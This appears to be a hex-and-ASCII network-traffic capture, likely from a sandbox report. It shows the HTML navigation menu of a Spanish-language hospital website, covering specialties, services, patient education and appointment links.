                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8177INData Raw: 22 6e 6f 73 6f 74 72 6f 73 2f 66 75 6e 64 61 63 69 6f 6e 2d 73 61 6e 2d 6c 75 69 73 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 46 75 6e 64 61 63 69 c3 b3 6e 20 53 61 6e 20 4c 75 69 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 62 69 6e
                                                                                                                                                                                                                                                        Data Ascii: "nosotros/fundacion-san-luis" target="_self">Fundacin San Luis</a></li> </ul> </li> <li class="menu-item "> <a tabin
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8178INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 69 6e 66 65 63 74 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 49 6e 66 65 63 74 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="especialidades/pediatricas/infectologia" target="_self">Infectologa</a></li> <li class="menu
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8179INData Raw: 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 72 61 64 69 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 52 61 64 69 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69
                                                                                                                                                                                                                                                        Data Ascii: lass="menu-item "><a href="especialidades/pediatricas/radiologia" target="_self">Radiologa</a></li> <li class="menu-item "><a href="especiali
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8181INData Raw: 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 6e 65 75 6d 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4e 65 75 6d 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: ="especialidades/pediatricas/neumologia" target="_self">Neumologa</a></li> </ul> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8182INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 20 6d 65 67 61 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 30 3e 20 53 65 72 76 69 63 69 6f 73 3c 2f 61 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 70 71 2d 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62
                                                                                                                                                                                                                                                        Data Ascii: </ul> </li> <li class="menu-item mega-menu"> <a tabindex=0> Servicios</a><i class="fa fa-chevron-down pq-submenu-icon"></i> <ul class="sub
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8183INData Raw: 22 5f 73 65 6c 66 22 3e 4c 61 70 61 72 6f 73 63 c3 b3 70 69 63 61 20 65 20 68 69 73 74 65 72 6f 73 63 c3 b3 70 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 63 61 72 64 69 6f 76 61 73 63 75 6c 61 72 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 43 61 72 64 69 6f 76 61 73 63 75 6c
                                                                                                                                                                                                                                                        Data Ascii: "_self">Laparoscpica e histeroscpica</a></li> <li class="menu-item "><a href="servicios/cirugia/cardiovascular" target="_self">Cardiovascul
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8185INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 70 65 64 69 61 74 72 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 65 64 69 c3 a1 74 72 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="servicios/cirugia/pediatrica" target="_self">Peditrica</a></li> <li class="menu-item "><a hre
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8186INData Raw: 6f 73 2d 6f 64 6f 6e 74 6f 6c 6f 67 69 63 6f 73 2d 62 61 6a 6f 2d 61 6e 65 73 74 65 73 69 61 2d 67 65 6e 65 72 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 72 6f 63 65 64 69 6d 69 65 6e 74 6f 73 20 6f 64 6f 6e 74 6f 6c c3 b3 67 69 63 6f 73 20 62 61 6a 6f 20 61 6e 65 73 74 65 73 69 61 20 67 65 6e 65 72 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c
                                                                                                                                                                                                                                                        Data Ascii: os-odontologicos-bajo-anestesia-general" target="_self">Procedimientos odontolgicos bajo anestesia general</a></li> </ul> </l
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8188INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 75 6e 69 64 61 64 2d 64 65 2d 68 65 6d 61 74 6f 2d 6f 6e 63 6f 6c 6f 67 69 61 2d 70 65 64 69 61 74 72 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 55 6e 69 64 61 64 20 64 65 20 68 65 6d 61 74 6f 20 e2 80 93 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 20 70 65 64 69 c3 a1 74 72 69 63 61 3c 2f 61 3e 3c 2f 6c
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="servicios/unidad-de-hemato-oncologia-pediatrica" target="_self">Unidad de hemato oncologa peditrica</a></l
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8189INData Raw: 6f 73 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 2f 73 65 72 76 69 63 69 6f 2d 74 72 61 6e 73 66 75 73 69 6f 6e 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 53 65 72 76 69 63 69 6f 20 74 72 61 6e 73 66 75 73 69 6f 6e 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 61 70 6f 79 6f 2d 64 69 61
                                                                                                                                                                                                                                                        Data Ascii: os/apoyo-diagnostico/servicio-transfusional" target="_self">Servicio transfusional</a></li> <li class="menu-item "><a href="servicios/apoyo-dia
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8190INData Raw: 54 61 63 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 2f 70 72 6f 63 65 64 69 6d 69 65 6e 74 6f 2d 64 65 2d 6d 65 64 69 63 69 6e 61 2d 6d 61 74 65 72 6e 6f 2d 66 65 74 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 72 6f 63 65 64 69 6d 69 65 6e 74 6f 20
                                                                                                                                                                                                                                                        Data Ascii: Tac</a></li> <li class="menu-item "><a href="servicios/apoyo-diagnostico/procedimiento-de-medicina-materno-fetal" target="_self">Procedimiento
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8192INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 74 65 72 61 70 69 61 2f 6f 63 75 70 61 63 69 6f 6e 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4f 63 75 70 61 63 69 6f 6e 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="servicios/terapia/ocupacional" target="_self">Ocupacional</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8193INData Raw: 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 6c 61 6e 69 66 69 63 61 63 69 c3 b3 6e 20 66 61 6d 69 6c 69 61 72 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 75 72 73 6f 2d 70 73 69 63 6f 70 72 6f 66 69 6c 61 63 74 69 63 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 43 75 72 73 6f 20 50 73 69 63 6f
                                                                                                                                                                                                                                                        Data Ascii: target="_self">Planificacin familiar</a></li> <li class="menu-item "><a href="servicios/curso-psicoprofilactico" target="_self">Curso Psico
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8194INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 6d 65 64 69 63 69 6e 61 2d 66 69 73 69 63 61 2d 79 2d 72 65 68 61 62 69 6c 69 74 61 63 69 6f 6e 2f 6e 65 75 72 6f 63 6f 6e 64 75 63 63 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4e 65 75 72 6f 63 6f 6e 64 75 63 63 69 c3 b3 6e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="servicios/medicina-fisica-y-rehabilitacion/neuroconduccion" target="_self">Neuroconduccin</a></li> </u
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8195INData Raw: 38 30 30 30 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 30 3e 20 45 64 75 63 61 63 69 c3 b3 6e 20 61 6c 20 70 61 63 69 65 6e 74 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 70 71 2d 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: 8000 <a tabindex=0> Educacin al paciente</a> <i class="fa fa-chevron-down pq-submenu-icon"></i> <ul class="sub-menu">
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8197INData Raw: 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 49 41 4d 49 49 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 70 72 6f 67 72 61 6d 61 2d 6d 61 6d 61 2d 63 61 6e 67 75 72 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 72 6f
                                                                                                                                                                                                                                                        Data Ascii: target="_self">IAMII</a></li> <li class="menu-item "><a href="pacientes/educacion-al-paciente/programa-mama-canguro" target="_self">Pro
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8198INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 48 65 6d 61 74 6f 20 e2 80 93 20 4f 6e 63 6f 6c 6f 67 c3 ad 61 20 70 65 64 69 c3 a1 74 72 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 76 61 63 75 6e 61 63 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: target="_self">Hemato Oncologa peditrica</a></li> <li class="menu-item "><a href="pacientes/educacion-al-paciente/vacunacion"
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8199INData Raw: 6c 66 22 3e 43 75 6f 74 61 20 6d 6f 64 65 72 61 64 6f 72 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 3e 20 50 75 62 6c 69 63 61 63 69 6f 6e 65 73 3c 2f 61 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 70 71 2d 73 75 62 6d 65 6e 75 2d 69 63 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: lf">Cuota moderadora</a></li> </ul> </li> <li class="menu-item "> <a href=publicaciones> Publicaciones</a><i class="fa fa-chevron-down pq-submenu-icon
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8201INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 6f 2f 61 67 65 6e 64 61 2d 74 75 2d 63 69 74 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 41 67 65 6e 64 61 20 74 75 20 63 69 74 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="contacto/agenda-tu-cita" target="_self">Agenda tu cita</a></li> </ul> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8202INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 6e 61 76 62 61 72 53 75 70 70 6f 72 74 65 64 43 6f 6e 74 65 6e 74 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 6f 66 66 63 61 6e 76 61 73 22 0a 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: v> </div> <button class="navbar-toggler" type="button" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation" data-bs-toggle="offcanvas"
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8203INData Raw: 3c 61 20 68 72 65 66 3d 22 23 73 75 62 6d 65 6e 75 2d 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 62 65 74 77 65 65 6e 20 6d 65 6e 75 2d 69 74 65 6d 73 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 3e 20 4e 6f 73 6f 74 72 6f 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 61 6e 67 6c 65 2d 64 6f 77 6e 20 70 6f 73 69 74 69 6f 6e 2d
                                                                                                                                                                                                                                                        Data Ascii: <a href="#submenu-2" class="nav-link d-flex justify-content-between menu-items align-items-center" data-bs-toggle="collapse"> Nosotros <i class="fa fa-angle-down position-
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8205INData Raw: 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 49 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
